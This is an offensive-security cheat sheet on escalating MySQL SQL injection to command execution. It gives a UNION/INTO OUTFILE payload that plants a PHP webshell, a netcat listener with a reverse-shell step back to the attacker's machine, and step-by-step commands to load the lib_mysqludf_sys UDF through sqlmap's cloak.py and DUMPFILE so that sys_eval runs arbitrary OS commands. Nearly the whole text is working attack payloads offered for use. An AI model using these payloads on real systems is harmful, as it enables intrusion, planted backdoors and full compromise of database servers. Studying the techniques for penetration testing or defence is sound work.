Webshell and UDF

Method 1: Webshell

If we have write permission, we can use UNION attack and INTO OUTFILE to create a PHP webshell on the target system:
SELECT username,password FROM users WHERE id = '1' UNION SELECT 1,'<?php system($_GET["cmd"]);?>' INTO OUTFILE '/var/www/html/images/webshell.php';
Here we choose the images directory since it is usually owned by the www-data user, not root.
Once the webshell is created successfully, we can spawn a netcat reverse shell. Start a listener on our local machine:
nc -nvlp 443
Spawn a netcat reverse shell using the webshell: -e /bin/bash <local_ip> 443

Method 2: UDF

There is a plugin lib_mysqludf_sys which contains the following dangerous functions:
  • sys_eval(): executes any command and returns the result
  • sys_exec(): executes any command and returns the return code
  • sys_get(): gets an environment variable
  • sys_set(): creates or modifies an environment variable
MySQL does not have this lib by default. In order to use these functions, we have to import lib_mysqludf_sys first. Generate a binary version of this lib using sqlmap cloak.py:
cd sqlmap/extra/cloak
python3 cloak.py -d -i ../../data/udf/mysql/linux/32/lib_mysqludf_sys.so_ -o lib_mysqludf_sys.so
Grab its content as hex:
xxd -ps lib_mysqludf_sys.so
Connect to MySQL. In the MySQL shell, copy and paste the hex data and unhex() it:
SELECT unhex('<hex_data_in_lib_linux.so>') INTO DUMPFILE '/usr/lib/mysql/plugin/lib_mysqludf_sys.so
Here we use DUMPFILE instead OUTFILE since DUMPFILE outputs a unmodified binary file while OUTFILE adds newlines and escapes some special characters.
Exports the sys_eval() function from lib_mysqludf_sys.so:
CREATE FUNCTION sys_eval returns string soname "lib_mysqludf_sys.so"
At this stage we can execute any command using the sys_eval() function:
SELECT sys_eval('id');